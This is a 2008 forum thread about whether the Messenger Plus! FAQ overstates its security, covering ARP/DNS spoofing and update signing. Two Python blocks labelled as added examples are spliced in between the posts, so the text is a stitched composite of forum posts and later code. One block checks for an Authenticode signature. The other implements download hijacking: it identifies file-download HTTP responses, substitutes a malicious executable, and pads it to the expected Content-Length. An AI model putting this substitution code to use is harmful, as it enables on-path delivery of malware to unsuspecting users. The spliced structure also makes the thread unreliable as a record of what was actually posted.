Mistruth in FAQ
Burningmace
Junior Member
Posts: 20
Joined: Sep 2008
O.P. RE: Mistruth in FAQ
Ok, point taken. I still think that saying that it is completely secure is a blatant lie though. Nonetheless I'm reporting the ARP/DNS attack as a bug, along with a sample exploitable situation and a solution. If it is ignored, I'll post it on SecurityFocus and a few other sites and let those guys mull it over. By that time if they don't want to spend time fixing it somebody will exploit it and you can go from there.
09-24-2008 12:20 AM
segosa
Community's Choice
Posts: 1407
Reputation: 92
Joined: Feb 2003
RE: RE: Mistruth in FAQ
quote:
Originally posted by Burningmace

2) Even if an attacker discovered that their victim downloaded files regularly from a single site, the task of creating a believable replica of the site in order to fool them is often infeasible with the time frame involved.


Using your precious little ARP/DNS spoofing and hijacking all HTTP requests: when you see HTTP response headers from a server that signify a download (Content-Disposition: attachment; etc), block the content of the download and send your own viral code.
09-24-2008 12:21 AM
WDZ
Former Admin
Posts: 7106
Reputation: 107
Joined: Mar 2002
RE: Mistruth in FAQ
Thread moved to Forum & Website since it's regarding a change to the FAQ.

In response to your concerns about getting malware via the auto-update system:

quote:
Originally posted by Patchou
As for binaries being downloaded, you may be happy to know that I'm not completely stupid and that no exe file downloaded by the auto-update system of Messenger Plus! will be executed if it's not digitally signed by myself.
(That was posted in a private forum, so I can't link to it)
09-24-2008 12:35 AM
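The gate Patchou describes above (refuse to run a downloaded exe unless it carries his digital signature) starts with a structural check: does the file have an embedded Authenticode certificate table at all? The following is an added example, not code from the thread, from Patchou or from Messenger Plus!. It walks the documented PE/COFF headers with the standard library and constructs a throwaway PE32 skeleton inline for the demonstration; the "signature" inside it is a placeholder blob, not real PKCS#7 data.

```python
"""
Added example (not from the thread or from Messenger Plus!): locate the
Authenticode certificate table in a PE file.  The sample image built by
build_sample_pe() is constructed for the demo and is not an executable.
"""
from __future__ import annotations

import struct
from typing import Optional

PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B
SECURITY_DIR_INDEX = 4                  # IMAGE_DIRECTORY_ENTRY_SECURITY
WIN_CERT_TYPE_PKCS_SIGNED_DATA = 0x0002  # wCertificateType for Authenticode


def security_directory(data: bytes) -> Optional[tuple[int, int]]:
    """Return (file_offset, size) of the certificate table, or None.

    Unlike every other data directory, the security entry holds a raw file
    offset rather than an RVA.  Any structural problem yields None so the
    caller can treat "malformed" the same as "unsigned".
    """
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    coff = e_lfanew + 4                          # IMAGE_FILE_HEADER, 20 bytes
    if len(data) < coff + 20:
        return None
    (opt_size,) = struct.unpack_from("<H", data, coff + 16)
    opt = coff + 20                              # IMAGE_OPTIONAL_HEADER
    if opt_size < 2 or len(data) < opt + opt_size:
        return None
    (magic,) = struct.unpack_from("<H", data, opt)
    if magic == PE32_MAGIC:
        count_off, dirs_off = 92, 96
    elif magic == PE32PLUS_MAGIC:
        count_off, dirs_off = 108, 112
    else:
        return None
    if opt_size < count_off + 4:
        return None
    (n_dirs,) = struct.unpack_from("<I", data, opt + count_off)
    entry = dirs_off + SECURITY_DIR_INDEX * 8
    if n_dirs <= SECURITY_DIR_INDEX or opt_size < entry + 8:
        return None
    offset, size = struct.unpack_from("<II", data, opt + entry)
    if offset == 0 or size == 0 or offset + size > len(data):
        return None
    return offset, size


def has_embedded_signature(data: bytes) -> bool:
    """True if a WIN_CERTIFICATE of type PKCS#7 SignedData is attached.

    Presence is not validity: anyone can attach a blob here.  A real updater
    must still verify the PKCS#7 signature against the image hash and pin the
    expected signer (WinVerifyTrust on Windows); this example stops short of
    that and only answers "is there anything to verify?".
    """
    loc = security_directory(data)
    if loc is None:
        return False
    offset, size = loc
    if size < 8:
        return False
    length, _revision, cert_type = struct.unpack_from("<IHH", data, offset)
    return length <= size and cert_type == WIN_CERT_TYPE_PKCS_SIGNED_DATA


def build_sample_pe(signed: bool) -> bytes:
    """Construct a minimal PE32 header skeleton (constructed sample, not runnable)."""
    opt = bytearray(224)                         # standard PE32 optional header
    struct.pack_into("<H", opt, 0, PE32_MAGIC)
    struct.pack_into("<I", opt, 92, 16)          # NumberOfRvaAndSizes
    dos = b"MZ" + bytes(58) + struct.pack("<I", 0x40)   # e_lfanew -> 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, len(opt), 0x102)
    body_len = len(dos) + 4 + len(coff) + len(opt)
    cert = b""
    if signed:
        blob = b"\x30\x82" + bytes(30)           # placeholder, not real DER
        cert = struct.pack("<IHH", 8 + len(blob), 0x0200,
                           WIN_CERT_TYPE_PKCS_SIGNED_DATA) + blob
        struct.pack_into("<II", opt, 96 + SECURITY_DIR_INDEX * 8,
                         body_len, len(cert))    # offset + size of the table
    return dos + b"PE\0\0" + coff + bytes(opt) + cert


if __name__ == "__main__":
    for flag in (True, False):
        print(flag, has_embedded_signature(build_sample_pe(flag)))
```

The useful property for the thread's argument is the failure mode: a truncated or tampered file, an unsigned file, or a file whose certificate table points outside the image all fall through to "unsigned" and are refused, which is the behaviour Patchou's rule needs before any cryptographic check even runs.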
Burningmace
Junior Member
Posts: 20
Joined: Sep 2008
O.P. RE: Mistruth in FAQ
That is unlikely to fool anyone. The file size will be completely wrong, the download isn't that easy to catch (content-disposition isn't always set and some sites will have blablabla.exe as their request but will return a content-type of text/plain) and the network load would double (one packet from the user to the attacker, another packet from the attacker to the server), thus slowing down the traffic and alerting the user to a problem.

quote:
Originally posted by WDZ
Thread moved to Forum & Website since it's regarding a change to the FAQ.

In response to your concerns about getting malware via the auto-update system:

quote:
Originally posted by Patchou
As for binaries being downloaded, you may be happy to know that I'm not completely stupid and that no exe file downloaded by the auto-update system of Messenger Plus! will be executed if it's not digitally signed by myself.
(That was posted in a private forum, so I can't link to it)


Huzzah! In fact now I feel a little stupid for not thinking of that myself.

Nonetheless I still stick by my point that the FAQ is not accurate - there is not 100% guarantee that some exploit (no matter what it is, where it comes from or what medium it uses to get to the client) will not be found. There is no such thing as complete security on a networked system.

This post was edited on 09-24-2008 at 12:42 AM by Burningmace.
09-24-2008 12:37 AM
Lou
Veteran Member
Posts: 2475
Reputation: 43
Joined: Aug 2004
RE: Mistruth in FAQ
quote:
Originally posted by Burningmace
No, there is no way Messenger Plus! could have any security flaw that would let non-allowed software to connect on your computer.
quote:
Originally posted by Burningmace
no matter what it is, where it comes from or what medium it uses to get to the client
Plus! won't have a flaw itself that will allow this to happen because it doesn't let those exe's be run if they are not digitally signed. He can't account for any other method of these things coming in, like the http connection. If something comes in that way, it's not a Plus! flaw, but a flaw in whatever it is Plus! is using to connect elsewhere, is it not?
09-24-2008 01:10 AM
segosa
Community's Choice
Posts: 1407
Reputation: 92
Joined: Feb 2003
RE: RE: Mistruth in FAQ
quote:
Originally posted by Burningmace
That is unlikely to fool anyone. The file size will be completely wrong.

So modify the Content-Length header too?! (or pad out your virus's executable)

quote:
Originally posted by Burningmace
the download isn't that easy to catch (content-disposition isn't always set and some sites will have blablabla.exe as their request but will return a content-type of text/plain)

... no.

If the Content-Type is text/plain the browser will display the contents in the window and not download it unless the Content-Disposition exists, in which case it will ignore the Content-Type and download it.

http://gifpaste.org/test.php?x=1

code:
        header("Content-Type: text/plain");
        header("Content-Disposition: attachment; filename=test.bin");


Ignores the text/plain header and prompts the user to download test.bin.

http://gifpaste.org/test.php?x=2

code:
        header("Content-Type: application/x-msdownload");


Prompts the user to download it using a default filename, so in this rare case you could detect the specific Content-Types related to the downloading of executable files (application/x-msdownload in this case).

http://gifpaste.org/test.php?x=3

code:
        header("Content-Type: text/plain");


Displays the contents of the file in the browser. In this case you wouldn't hijack the request.

Every website that wants you to download a file will use Content-Disposition if they want the filename to be something that makes sense. This means that Content-Disposition will catch 99% of all HTTP file-download responses.

quote:
Originally posted by Burningmace

and the network load would double (one packet from the user to the attacker, another packet from the attacker to the server), thus slowing down the traffic and alerting the user to a problem.


Not only is this untrue (the hijacker/attacker modifies the received HTTP packets on the fly, then sends them on, and if they wanted to appear inconspicuous, could even download the original file the user requested) but no normal user would even notice more bandwidth being used.

From the server's perspective, someone is downloading the file requested.

From the user's perspective, they are downloading a file.

You could even take the Content-Length header if you didn't want to rewrite it, and pad out your viral executable with bytes that wouldn't affect its execution so that the browser would report the correct filesize.

This post was edited on 09-24-2008 at 09:39 AM by segosa.
09-24-2008 01:10 AM
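The three gifpaste.org tests above reduce to one decision an on-path hijacker has to make per response, plus the Content-Length trick at the end of the post. The following is an added example, not code from the thread or from any product it mentions: it implements the decision in the order segosa observed (Content-Disposition wins over Content-Type; a binary Content-Type alone still downloads; bare text/plain is displayed) and pads the substituted payload to the advertised size. The three responses are constructed inline to mirror test.php?x=1..3; application/x-msdownload is the type from the post, the other two entries in DOWNLOAD_TYPES are assumed equivalents.

```python
"""
Added example (not from the thread): classify HTTP responses as a download
hijacker would, then substitute a payload while keeping Content-Length honest.
"""
from __future__ import annotations

from typing import Optional

# MIME types browsers save to disk even without Content-Disposition.
# x-msdownload is from segosa's test; the other two are assumed equivalents.
DOWNLOAD_TYPES = {"application/x-msdownload", "application/x-msdos-program",
                  "application/octet-stream"}

PAYLOAD = b"MZ" + bytes(62)        # constructed stand-in for an attacker's exe

# Constructed responses mirroring test.php?x=1, 2 and 3 from the post.
RESPONSES = {
    1: b"HTTP/1.1 200 OK\r\nContent-Type: text/plain\r\n"
       b"Content-Disposition: attachment; filename=test.bin\r\n"
       b"Content-Length: 100\r\n\r\n" + bytes(100),
    2: b"HTTP/1.1 200 OK\r\nContent-Type: application/x-msdownload\r\n"
       b"Content-Length: 100\r\n\r\n" + bytes(100),
    3: b"HTTP/1.1 200 OK\r\nContent-Type: text/plain\r\n"
       b"Content-Length: 100\r\n\r\n" + bytes(100),
}


def parse_head(raw: bytes) -> tuple[str, dict[str, str], bytes]:
    """Split a raw response into (status line, lower-cased headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers: dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        if value:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def classify(headers: dict[str, str]) -> str:
    """'attachment', 'download' (by type) or 'display', in browser precedence."""
    disposition = headers.get("content-disposition", "").lower()
    ctype = headers.get("content-type", "").partition(";")[0].strip().lower()
    if disposition.startswith("attachment"):    # x=1: beats text/plain
        return "attachment"
    if ctype in DOWNLOAD_TYPES:                  # x=2: binary type, no disposition
        return "download"
    return "display"                             # x=3: rendered, not hijacked


def pad_to_length(payload: bytes, target: int) -> Optional[bytes]:
    """Pad a PE payload to the advertised size with a trailing overlay.

    Bytes after the last section are ignored by the loader, so the file still
    runs.  If the payload is already larger, return None so the caller falls
    back to rewriting Content-Length instead.
    """
    if len(payload) > target:
        return None
    return payload + bytes(target - len(payload))


def substitute(raw: bytes, payload: bytes) -> Optional[bytes]:
    """Return the hijacked response, or None when the response is not a download."""
    status, headers, _ = parse_head(raw)
    if classify(headers) == "display":
        return None
    advertised = int(headers.get("content-length") or 0)
    body = pad_to_length(payload, advertised) if advertised else None
    if body is None:                   # no length, or payload too big: rewrite
        body = payload
        headers["content-length"] = str(len(body))
    head = "\r\n".join([status] + [f"{k}: {v}" for k, v in headers.items()])
    return head.encode("latin-1") + b"\r\n\r\n" + body


if __name__ == "__main__":
    for x, resp in RESPONSES.items():
        print(x, classify(parse_head(resp)[1]))
```

Note that the same classifier is what a network defender would run in reverse: a response whose Content-Disposition or executable Content-Type does not match what the origin normally serves for that path is exactly the anomaly an on-path substitution produces.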
Burningmace
Junior Member
Posts: 20
Joined: Sep 2008
O.P. RE: RE: Mistruth in FAQ
quote:
Originally posted by .Lou
quote:
Originally posted by Burningmace
No, there is no way Messenger Plus! could have any security flaw that would let non-allowed software to connect on your computer.
quote:
Originally posted by Burningmace
no matter what it is, where it comes from or what medium it uses to get to the client
Plus! won't have a flaw itself that will allow this to happen because it doesn't let those exe's be run if they are not digitally signed. He can't account for any other method of these things coming in, like the http connection. If something comes in that way, it's not a Plus! flaw, but a flaw in whatever it is Plus! is using to connect elsewhere, is it not?

As I said, I am talking about exploits in a general way. Nothing specific. If xyz vulnerability is found in Plus! and that vulnerability is exploited, the FAQ states blanket security and that is not true. If some hacker uses the exploit to attack a corporate network, they'll look for someone to blame. If they find your FAQ and it says "No, there is no way for you to get hacked through Plus", they'll sue your asses until you're homeless.
09-24-2008 10:09 AM
Menthix
forum admin
Posts: 5537
Reputation: 102
Joined: Mar 2002
RE: Mistruth in FAQ
quote:
Originally posted by Burningmace
If they find your FAQ and it says "No, there is no way for you to get hacked through Plus", they'll sue your asses until you're homeless.
Except Patchou doesn't live in lets-just-sue-someone-because-we-cant-think-for-our-selves-land USA, and the FAQ isn't any form of legal document.

The piece of FAQ you quoted is correct. Don't forget this FAQ entry answers the question "Can Messenger Plus! Live open a back door for viruses and trojans?". The question is answered by explaining Messenger Plus! doesn't make any network connections directly (except for mail checking), and by doing so it doesn't add any extra risk on a network level. You do have a point, but these are all general flaws, nothing specific to Messenger Plus! only.

quote:
Originally posted by Burningmace
If they find your FAQ and it says "No, there is no way for you to get hacked through Plus"
The FAQ actually doesn't say that anywhere.
09-24-2008 11:25 AM
Spunky
Former Super Mod
Posts: 3658
Reputation: 61
Joined: Aug 2006
RE: Mistruth in FAQ
Plus! only has the same "security flaws" as any other application which connects to the net, whether it be Adobe, Office or a torrent program for example. The fact is, that if someone has enough time to connect to someone's network, discover the programs and services they use, intercept incoming messages and replace them with their own code, they deserve to be able to send somebody a virus. All that work and what do they have to show for it? The AV software or anti-spyware will get rid of it almost instantly and nobody will be worse off. It's kinda like saying your plane is 100% going to be hijacked... It's actually a lot of work and very unlikely to happen :p
09-24-2008 01:38 PM